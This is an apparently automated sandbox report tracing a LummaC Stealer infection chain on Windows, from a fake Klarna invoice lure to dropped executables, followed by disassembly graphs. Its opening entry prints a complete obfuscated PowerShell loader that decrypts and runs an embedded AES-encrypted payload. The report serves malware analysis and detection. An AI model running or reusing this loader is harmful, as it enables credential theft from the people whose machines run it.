                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '474A3D80681E00D6A2EF8CD9205A8000631C5C73110F4F3F98F9A3380757A56587AC33C982B8757EDE337D31FE178A5C76E820250B09678E60E099A6640F0003AD5BA580D4079FF31BFB3624F9936FF7E054A6F5E6ADF16AF70F2E258B230F0E119433E36E3EA1E08ACE300686446DBFFA1718086C874FC8A8A09ECE0BFD5827E2193AF83B13A9484213EC696E93EAD4E5C86D3B340D0383DF19D9C6B9177B473A715691E727DD59FAD481BB49CFEA164A8C8A2491D767B90BD1F1A11FC199A39158AB0C73865F35115CBBE29DBEC488B90B0DC061AD5039FE414583BD0E8BD4E7B7672D629DE366DBFAED2D2883ABA50A9A3E095A1B26777F10398DF92E050D286E806395A5648C371F95E62603829AB9CCCACC87BA02D01A00AFE9838ECF66997E0A551A83FFD859BBA6E2E568E9EDF081936A8569161CB274B3B9FC21427BBFF2D5D3CF500872D4A683668F2BA8C3038B93718EE8317DBCCA6305CD634DD1B2335210DC703C66A2F0B81A0128C9E257E324E61A18DA3ABFD1FF42A8E1E1E8F1E7A7E412839AAE35575C1AB8B6072F3F101F284610A7A9532CE85C597BD62A5F4DEB11490AF74CF21ECB396C3208FB1E2589B5CE209FFE1017BD9C5FAECDA99ACB77A243D50657551D5D47F459F8E119B10653DCCB3289C76C9277136D22F53A69199D62D4FFD4041CF72E1A171243BD2074D940A15228E8513CE7A56D65D8EC952DA1892A1C0DD32267424040F32729D596424618D14BC5778CA69A50F5378CE90DD67BF9999C530599FA84EEDF1437CAD4599F3B7A5E7C715AF39F96B02950C66C2C6BA86E0CA9B675D12FDB087692B5AAB0023D114DDA9F406E075D82EBF2F19297D6F614E17214DB113946B455BD69B36718F5E9FDD59B17F24ADE82623F8E02D3779A8A68B9AD01E429B87EFA6E75E2447F0911F56F9765C959A678DCB2037D736BE2BEBFAA18D5CD0E5D31518F484AA55F2B977C501125F80803041206588BADA41525EE9B8028EA58781C70961A6BB0694F09DA35A160ED1AE70FB8C2E6354A6F03BFC8C02611C83AD60917171564EB342465A947A75C12850F40B68C68DF9C5D83328A98798B17DBEA519B0CE39850F7D8E390584FED55BE5059CA71D2719A0D9B3575AD4DA7287E4D5C5F7EFBA6CC3A3F7F4BCD13AC1249B159691B69F1D64638B49A4BB7A28DA57B77892D7E8F00A1D56280ACF19657E31A66DFC23FBA50CFDA53B25280E96E1FBF839A922391F2D69B1839C422568935D9A35EB45649512E2FDFF02BB416951E3F123183CA94CCFCCB683F885C28A6612BE81855A88151A9D947C889DF4B8536261DCAAD58C911647AB6B0D09AAE2E7F0815EF1890124C736FB150D2551F0419A04AA7E0C0AA8A883CD43E6C794BCACCAFBDC6CEA95B925F072D8EC8D52F266541A22E74F87228F055F2EC79DE196F94BD5C59D029B1320B41AAF44D624365A3C1EC5F6B716D4A575948474E4552594C66474E';function cZF ($PgTDvwwB){return -split ($PgTDvwwB -replace '..', '0x$& ')};$kvsOmI = cZF($ddg.SubString(0, 2080));$qlR = [System.Security.Cryptography.Aes]::Create();$qlR.Key = cZF($ddg.SubString(2080));$qlR.IV = New-Object byte[] 16;$GluWYuA = $qlR.CreateDecryptor();$ZwjPYT = [System.String]::new($GluWYuA.TransformFinalBlock($kvsOmI, 0,$kvsOmI.Length)); sal fd $ZwjPYT.Substring(3,3); fd $ZwjPYT.Substring(6)
                                                                                                              Imagebase:0x7ff788560000
                                                                                                              File size:452'608 bytes
                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:7
                                                                                                              Start time:03:14:12
                                                                                                              Start date:16/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:8
                                                                                                              Start time:03:14:16
                                                                                                              Start date:16/12/2024
                                                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\KlarnaInvoice42611.pdf"
                                                                                                              Imagebase:0x7ff6bc1b0000
                                                                                                              File size:5'641'176 bytes
                                                                                                              MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:9
                                                                                                              Start time:03:14:17
                                                                                                              Start date:16/12/2024
                                                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                              Imagebase:0x7ff74bb60000
                                                                                                              File size:3'581'912 bytes
                                                                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:false

                                                                                                              Target ID:10
                                                                                                              Start time:03:14:17
                                                                                                              Start date:16/12/2024
                                                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2072 --field-trial-handle=1636,i,12666906857534162029,3532720811796512563,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                              Imagebase:0x7ff74bb60000
                                                                                                              File size:3'581'912 bytes
                                                                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:false

                                                                                                              Target ID:16
                                                                                                              Start time:03:14:24
                                                                                                              Start date:16/12/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\IMAKBWPY.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\IMAKBWPY.exe"
                                                                                                              Imagebase:0x9a0000
                                                                                                              File size:3'082'476 bytes
                                                                                                              MD5 hash:EAE347B707607585B09FF0515E84087C
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:17
                                                                                                              Start time:03:14:25
                                                                                                              Start date:16/12/2024
                                                                                                              Path:C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exe" -burn.clean.room="C:\Users\user\AppData\Roaming\IMAKBWPY.exe" -burn.filehandle.attached=520 -burn.filehandle.self=516
                                                                                                              Imagebase:0x7ff72bec0000
                                                                                                              File size:2'984'244 bytes
                                                                                                              MD5 hash:E9D35A53128839CFBB1A329A23BB430B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:18
                                                                                                              Start time:03:14:25
                                                                                                              Start date:16/12/2024
                                                                                                              Path:C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:29'152 bytes
                                                                                                              MD5 hash:B6F6C3C38568EE26F1AC70411A822405
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                              Has exited:true

                                                                                                              Target ID:19
                                                                                                              Start time:03:14:43
                                                                                                              Start date:16/12/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exe
                                                                                                              Imagebase:0x400000
                                                                                                              File size:29'152 bytes
                                                                                                              MD5 hash:B6F6C3C38568EE26F1AC70411A822405
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                              Has exited:true

                                                                                                              Target ID:20
                                                                                                              Start time:03:15:00
                                                                                                              Start date:16/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Imagebase:0x240000
                                                                                                              File size:236'544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Has exited:true

                                                                                                              Target ID:21
                                                                                                              Start time:03:15:00
                                                                                                              Start date:16/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:22
                                                                                                              Start time:03:15:19
                                                                                                              Start date:16/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                              Imagebase:0x830000
                                                                                                              File size:4'514'184 bytes
                                                                                                              MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Reset < >
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000003.2218063132.000001D04EAE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001D04EAE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_3_1d04eae0000_mshta.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                • Instruction ID: 78da1038e1bf761c219dfceb3ae6950d48e64395595ce0140583296d17b491ca
                                                                                                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                • Instruction Fuzzy Hash: 499004544DF40755D41D11D50CC57DD50C073CC350FD44CC14517D0544D54D17F75153
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000003.2218063132.000001D04EAE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001D04EAE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_3_1d04eae0000_mshta.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                • Instruction ID: 78da1038e1bf761c219dfceb3ae6950d48e64395595ce0140583296d17b491ca
                                                                                                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                • Instruction Fuzzy Hash: 499004544DF40755D41D11D50CC57DD50C073CC350FD44CC14517D0544D54D17F75153
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000003.2218063132.000001D04EAE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001D04EAE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_3_1d04eae0000_mshta.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                • Instruction ID: 78da1038e1bf761c219dfceb3ae6950d48e64395595ce0140583296d17b491ca
                                                                                                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                • Instruction Fuzzy Hash: 499004544DF40755D41D11D50CC57DD50C073CC350FD44CC14517D0544D54D17F75153
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2210902328.00007FFD9AA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AA70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffd9aa70000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2d6f634fed253af1a4109030bda2d982db610e345c0b80a100bcbc1ecbf667e3
                                                                                                                • Instruction ID: 3f0b76978c4aa389233fe5600c96f0ad044f30f8a98565591d026fa7d1cb1c0b
                                                                                                                • Opcode Fuzzy Hash: 2d6f634fed253af1a4109030bda2d982db610e345c0b80a100bcbc1ecbf667e3
                                                                                                                • Instruction Fuzzy Hash: 2B12F523E0EBC60FE7AA97B808756BA7FD1DF52214B1901FBD099C70E3DD1968068352
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2210902328.00007FFD9AA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AA70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffd9aa70000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d40893ae4f5f2825889d491dccc7cfeb269e384e33e11a626341f2eab9b2f480
                                                                                                                • Instruction ID: 6bc535e7aa8bd3db884dc56338343c2ad9cf16ccc95f6a5860fc9a5462aa7745
                                                                                                                • Opcode Fuzzy Hash: d40893ae4f5f2825889d491dccc7cfeb269e384e33e11a626341f2eab9b2f480
                                                                                                                • Instruction Fuzzy Hash: 1C412053F0EA8A1FE7A8A7A818B51B577D1EF99214B0A00FBD05DC71D7EC1AAC068351
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2210902328.00007FFD9AA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AA70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffd9aa70000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cda1db4df5535105b042c945c733ec0f902b925d8c4e9c121eff1a5e1f8378ea
                                                                                                                • Instruction ID: 50200073964a255eed55ea0c2d0a4410a39797c0fb4acf4790e69f7ad6945595
                                                                                                                • Opcode Fuzzy Hash: cda1db4df5535105b042c945c733ec0f902b925d8c4e9c121eff1a5e1f8378ea
                                                                                                                • Instruction Fuzzy Hash: C741B253F0EACB0BF7BD97A808B527E76C1EF92618B5801FAD56DC71E2DD18A8064201
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2209867522.00007FFD9A9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A9A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffd9a9a0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                • Instruction ID: 8dd67335b8d5a95cd6043bc74000fbb3d6d24ba5291f8daba1a93c10b6a997a0
                                                                                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                • Instruction Fuzzy Hash: 1101A77121CB0C8FD748EF0CE451AA5B3E0FB85324F10056EE58AC3695DA32E882CB42
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2210902328.00007FFD9AA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AA70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffd9aa70000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 66d0dae08770d495fc6cc9d7d842ac88e0243930e9cb8bef4d03e0255b1bad1f
                                                                                                                • Instruction ID: c35f65bce3ae6ed85805d1c85c7d7271c2b77623b2eac6257783b9e4646fe136
                                                                                                                • Opcode Fuzzy Hash: 66d0dae08770d495fc6cc9d7d842ac88e0243930e9cb8bef4d03e0255b1bad1f
                                                                                                                • Instruction Fuzzy Hash: 50E09223F0EC592FEBB5A6DC28681F67681DF5426674801F6E81DD31C5DD049C114685

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 864 9a3cc4-9a3d51 call 9cf8e0 * 2 GetFileAttributesW 869 9a3d53-9a3d5a GetLastError 864->869 870 9a3d85-9a3d88 864->870 871 9a3d5f-9a3d61 869->871 872 9a3d5c-9a3d5e 869->872 873 9a3d8e-9a3d91 870->873 874 9a40d5 870->874 875 9a3d6e 871->875 876 9a3d63-9a3d6c 871->876 872->871 878 9a3dca-9a3dd1 873->878 879 9a3d93-9a3da6 SetFileAttributesW 873->879 877 9a40da-9a40e3 874->877 875->870 882 9a3d70-9a3d71 875->882 876->875 883 9a40ec-9a40f3 877->883 884 9a40e5-9a40e6 FindClose 877->884 880 9a3dd3-9a3dda 878->880 881 9a3de0-9a3de8 878->881 879->878 885 9a3da8-9a3dae GetLastError 879->885 880->881 888 9a4058 880->888 889 9a3dea-9a3dfe GetTempPathW 881->889 890 9a3e25-9a3e40 call 9a2d58 881->890 891 9a3d76-9a3d80 call 9a3821 882->891 892 9a4100-9a4112 call 9ce06f 883->892 893 9a40f5-9a40fb call 9e5636 883->893 884->883 886 9a3dbb 885->886 887 9a3db0-9a3db9 885->887 894 9a3dbd 886->894 895 9a3dc2-9a3dc8 886->895 887->886 896 9a405e-9a406c RemoveDirectoryW 888->896 889->890 897 9a3e00-9a3e06 GetLastError 889->897 890->883 908 9a3e46-9a3e62 FindFirstFileW 890->908 891->883 893->892 894->895 895->891 896->877 902 9a406e-9a4074 GetLastError 896->902 903 9a3e08-9a3e11 897->903 904 9a3e13 897->904 909 9a407f-9a4085 902->909 910 9a4076-9a4079 902->910 903->904 911 9a3e1a-9a3e20 904->911 912 9a3e15 904->912 913 9a3e89-9a3e93 908->913 914 9a3e64-9a3e6a GetLastError 908->914 915 9a40a1-9a40a3 909->915 916 9a4087-9a4089 909->916 910->909 911->891 912->911 920 9a3eba-9a3ee0 call 9a2d58 913->920 921 9a3e95-9a3e9e 913->921 918 9a3e6c-9a3e75 914->918 919 9a3e77 914->919 915->877 917 9a40a5-9a40ab 915->917 916->917 922 9a408b-9a409d MoveFileExW 916->922 923 9a3ffa-9a4004 call 9a3821 917->923 918->919 924 9a3e79 919->924 925 9a3e7e-9a3e7f 919->925 920->877 938 9a3ee6-9a3ef3 920->938 926 9a3fbd-9a3fcd FindNextFileW 921->926 927 9a3ea4-9a3eab 921->927 922->917 929 9a409f 922->929 923->877 924->925 925->913 930 9a3fcf-9a3fd5 926->930 931 9a404d-9a4052 GetLastError 926->931 927->920 933 9a3ead-9a3eb4 927->933 929->915 930->913 935 9a40b0-9a40b6 GetLastError 931->935 936 9a4054-9a4056 931->936 933->920 933->926 939 9a40b8-9a40c1 935->939 940 9a40c3 935->940 936->896 941 9a3f22-9a3f29 938->941 942 9a3ef5-9a3ef7 938->942 939->940 944 9a40ca-9a40d0 940->944 945 9a40c5 940->945 946 9a3f2f-9a3f31 941->946 947 9a3fb7 941->947 942->941 943 9a3ef9-9a3f09 call 9a2b0c 942->943 943->877 954 9a3f0f-9a3f18 call 9a3cc4 943->954 944->923 945->944 949 9a3f4c-9a3f5a DeleteFileW 946->949 950 9a3f33-9a3f46 SetFileAttributesW 946->950 947->926 949->947 953 9a3f5c-9a3f5e 949->953 950->949 952 9a3fda-9a3fe0 GetLastError 950->952 955 9a3fed 952->955 956 9a3fe2-9a3feb 952->956 957 9a402b-9a4031 GetLastError 953->957 958 9a3f64-9a3f81 GetTempFileNameW 953->958 968 9a3f1d 954->968 962 9a3fef 955->962 963 9a3ff4-9a3ff5 955->963 956->955 959 9a403e 957->959 960 9a4033-9a403c 957->960 964 9a4009-9a400f GetLastError 958->964 965 9a3f87-9a3fa4 MoveFileExW 958->965 966 9a4040 959->966 967 9a4045-9a404b 959->967 960->959 962->963 963->923 969 9a401c 964->969 970 9a4011-9a401a 964->970 971 9a3faf 965->971 972 9a3fa6-9a3fad 965->972 966->967 967->923 968->947 973 9a401e 969->973 974 9a4023-9a4029 969->974 970->969 975 9a3fb5 MoveFileExW 971->975 972->975 973->974 974->923 975->947
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 009A3D40
                                                                                                                • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 009A3D53
                                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000001,00000000,?), ref: 009A3D9E
                                                                                                                • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 009A3DA8
                                                                                                                • GetTempPathW.KERNEL32(00000104,?,?,?,?,00000001,00000000,?), ref: 009A3DF6
                                                                                                                • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 009A3E00
                                                                                                                • FindFirstFileW.KERNELBASE(?,?,?,*.*,?,?,?,?,00000001,00000000,?), ref: 009A3E53
                                                                                                                • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 009A3E64
                                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00000001,00000000,?), ref: 009A3F3E
                                                                                                                • DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,00000001,00000000,?), ref: 009A3F52
                                                                                                                • GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,00000001,00000000,?), ref: 009A3F79
                                                                                                                • MoveFileExW.KERNEL32(?,?,00000001,?,?,?,00000001,00000000,?), ref: 009A3F9C
                                                                                                                • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 009A3FB5
                                                                                                                • FindNextFileW.KERNELBASE(000000FF,?,?,?,?,?,?,?,00000001,00000000,?), ref: 009A3FC5
                                                                                                                • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 009A3FDA
                                                                                                                • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 009A4009
                                                                                                                • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 009A402B
                                                                                                                • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 009A404D
                                                                                                                • RemoveDirectoryW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 009A4064
                                                                                                                • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 009A406E
                                                                                                                • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 009A4095
                                                                                                                • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 009A40B0
                                                                                                                • FindClose.KERNEL32(000000FF,?,?,?,00000001,00000000,?), ref: 009A40E6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLast$AttributesFindMove$Temp$CloseDeleteDirectoryFirstNameNextPathRemove
                                                                                                                • String ID: *.*$DEL$dirutil.cpp
                                                                                                                • API String ID: 1544372074-1252831301
                                                                                                                • Opcode ID: 7295bfcde226a7951ab61d7dacddf7e1dee7d008c5df49219bc38c9d0d12301d
                                                                                                                • Instruction ID: b7405e15dfdc23f19815227fcadfd3338f4c2900e7cd0cdc08ceb5629631df21
                                                                                                                • Opcode Fuzzy Hash: 7295bfcde226a7951ab61d7dacddf7e1dee7d008c5df49219bc38c9d0d12301d
                                                                                                                • Instruction Fuzzy Hash: 93B12A73D15239DBDB315A658C05B9AB67DAF82720F0182A1FE08FB190D7728E90DED0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 976 9a5195-9a5243 call 9cf8e0 * 2 GetModuleHandleW call 9e04f8 call 9e06ae call 9a120a 987 9a5259-9a526a call 9a42d7 976->987 988 9a5245 976->988 994 9a526c-9a5271 987->994 995 9a5273-9a528f call 9a5618 CoInitializeEx 987->995 989 9a524a-9a5254 call 9e0237 988->989 996 9a54d4-9a54db 989->996 994->989 1004 9a5298-9a52a4 call 9dfcae 995->1004 1005 9a5291-9a5296 995->1005 998 9a54e8-9a54ea 996->998 999 9a54dd-9a54e3 call 9e5636 996->999 1002 9a54fa-9a5518 call 9ad82f call 9ba8d6 call 9bab24 998->1002 1003 9a54ec-9a54f3 998->1003 999->998 1025 9a551a-9a5522 1002->1025 1026 9a5546-9a5559 call 9a4fa4 1002->1026 1003->1002 1006 9a54f5 call 9b41ec 1003->1006 1013 9a52b8-9a52c7 call 9e0e07 1004->1013 1014 9a52a6 1004->1014 1005->989 1006->1002 1023 9a52c9-9a52ce 1013->1023 1024 9a52d0-9a52df call 9e2af7 1013->1024 1016 9a52ab-9a52b3 call 9e0237 1014->1016 1016->996 1023->1016 1032 9a52e8-9a52f7 call 9e3565 1024->1032 1033 9a52e1-9a52e6 1024->1033 1025->1026 1028 9a5524-9a5527 1025->1028 1037 9a555b call 9e3a35 1026->1037 1038 9a5560-9a5567 1026->1038 1028->1026 1031 9a5529-9a5544 call 9b434c call 9a5602 1028->1031 1031->1026 1044 9a52f9-9a52fe 1032->1044 1045 9a5300-9a531f GetVersionExW 1032->1045 1033->1016 1037->1038 1040 9a5569 call 9e2efe 1038->1040 1041 9a556e-9a5575 1038->1041 1040->1041 1047 9a557c-9a5583 1041->1047 1048 9a5577 call 9e1479 1041->1048 1044->1016 1050 9a5359-9a539e call 9a33c7 call 9a5602 1045->1050 1051 9a5321-9a532b GetLastError 1045->1051 1053 9a558a-9a558c 1047->1053 1054 9a5585 call 9dfdbd 1047->1054 1048->1047 1079 9a53a0-9a53ab call 9e5636 1050->1079 1080 9a53b1-9a53c1 call 9b752a 1050->1080 1056 9a5338 1051->1056 1057 9a532d-9a5336 1051->1057 1060 9a558e CoUninitialize 1053->1060 1061 9a5594-9a559b 1053->1061 1054->1053 1062 9a533a 1056->1062 1063 9a533f-9a5354 call 9a3821 1056->1063 1057->1056 1060->1061 1065 9a559d-9a559f 1061->1065 1066 